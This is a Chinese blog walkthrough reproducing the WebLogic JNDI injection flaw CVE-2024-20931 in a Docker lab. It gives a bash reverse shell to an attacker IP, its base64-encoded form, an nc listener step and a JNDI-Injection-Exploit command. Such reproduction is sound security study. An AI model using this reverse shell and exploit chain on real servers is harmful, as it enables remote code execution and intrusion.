首页 > 数据库 >Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)复现

Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)复现

时间:2024-03-22 09:22:50浏览次数:21  
标签:20931 shell 回显 漏洞 Server 2024 JNDI CVE

先从镜像站拉取Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)
然后在docker中启动这个镜像
即可在网页中访问,搭建网站成功
使用利用工具来进行验证是否存在漏洞
获取DNS查看是否有回显
有回显漏洞存在
创造反弹shell,先查看攻击机的ip
进行反弹shell编码
使用nc开启监听端口
接下来,运行JNDI注入工具:
再在工具中输入LDAP地址
查看nc是否回去shell
获取成功复现成功

先从镜像站拉取Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)

docker pull ismaleiva90/weblogic12

fig:

然后在docker中启动这个镜像

docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest

fig:

即可在网页中访问,搭建网站成功

fig:

使用利用工具来进行验证是否存在漏洞
获取DNS查看是否有回显

fig:

fig:

fig:

有回显漏洞存在
创造反弹shell,先查看攻击机的ip

fig:

bash -i >& /dev/tcp/192.168.162.1/5557 0>&1

进行反弹shell编码

fig:

bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNjIuMS81NTU3IDA+JjE=}|{base64,-d}|{bash,-i}

使用nc开启监听端口

fig:

接下来,运行JNDI注入工具:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编码后的反弹Shell命令" -A "启动恶意服务的服务器IP"

fig:

再在工具中输入LDAP地址

fig:

查看nc是否回去shell

fig:

获取成功复现成功

标签:20931,shell,回显,漏洞,Server,2024,JNDI,CVE
From: https://www.cnblogs.com/tree2698/p/18088699

相关文章

  • NOI2024前听课笔记2.0-《思维技巧选讲》by chenxia25
    NOI2024前听课笔记2.0-《思维技巧选讲》bychenxia25性质探索堆砌充分条件和必要条件luoguP10144[WC2024]水镜用形式化语言转化条件等价模型的刻画CF1458DFlipandReverseCF1510HHardOptimizationluoguP8293[省选联考2022]序列变换luoguP8416[THUPC2022决......
  • 2024.3.18-隐私计算-隐语-数据可信流通,从运维信任到技术信任
    学习感受本节课从背景介绍、可信/非可信与数据流通之间的关系、提出关于技术实现数据流通安全的解决方案笔记1:可信与非可信之间的关系可信:身份可确认、利益可依赖、能力有预期、行为有后果关于可信的定义/规则,其实在外循环当中其实很难去遵守,因为身份追踪是比......
  • 2024年3月21日-发出不同颜色的子弹
    将材质里面红色的光的颜色转换为参数,后面就可以直接调了  然后返回到材质页面,选择创建材质实例  然后把绿色的光里的光的颜色改为绿色 同理,再弄一个蓝色的光 将打框范围内的所有东西折叠为函数 然后改下名字为发射子弹 复制输入1,然后改为输入键盘2和3,准......
  • 文章分类列表(2024-3-21)
    //CategoryCOntroller@GetMappingpublicResult<List<Category>>list(){List<Category>cs=categoryService.list();returnResult.success(cs);}//ServiceList<Category>list();//ServiceImpl@Override......
  • 2024-03-21
    2024-03-21GrassCownoisseurG上周没写完的题分析过思路了,直接放码#include<iostream>#include<cstring>#include<algorithm>#include<vector>#include<queue>usingnamespacestd;constintN=100100,M=2*N;intn,m;inthd[N],edg[N],nxt[N],......
  • 2024年天梯成信校赛补题
    1-1代码胜于雄辩嘿嘿 L1-2收水费思路:分类讨论 L1-3日期思路:模拟 L1-4回文数思路:翻转后判断是否相等 L1-5yihan的新函数思路:模拟 L1-6二进制思路:二进制每位最多进位1,模拟下二进制加法即可 L1-7大山中的学院思路:统计每个山脉对空地的贡献 L1-8堆积木思......
  • 2024年3月21日-发射子弹
    创建组件子弹,然后挂上材质发光之后,然后给子弹加逻辑,选中自带模型角色新建图表→设置按1发射→输入从类然后选择spawnactorfromclass选择刚才设置的子弹然后点spawntransform,进行发射点设置,选择分割  把碰撞设置改成不碰撞输入self,然后输入位置,获取自身位置......
  • Sql Server 设置定时任务
    废话不多说,上教程。......
  • 20240321打卡
    第四周第一天第二天第三天第四天第五天第六天第七天所花时间1h5h3h1.5h代码量(行)212359274547博客量(篇)1111知识点了解Kotlin编写用户注册与登录功能jetpack的深入使用hilt依赖注入与kotlin协程等知识了解蓝桥杯题目练习......
  • 20240321每日一题题解
    20240321每日一题题解Problem已知\(f(x,n)=\sqrt{n+\sqrt{(n-1)+\sqrt{(n-2)+\sqrt{...+2+\sqrt{1+x}}}}}\)。计算\(f\)的值。输入\(x\)和\(n\)​。输出这个函数值,并且注意需要保留两位小数。例如,输入4.210,则应该输出3.68Solution递归?循环?说实话这道题是有一定思考......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99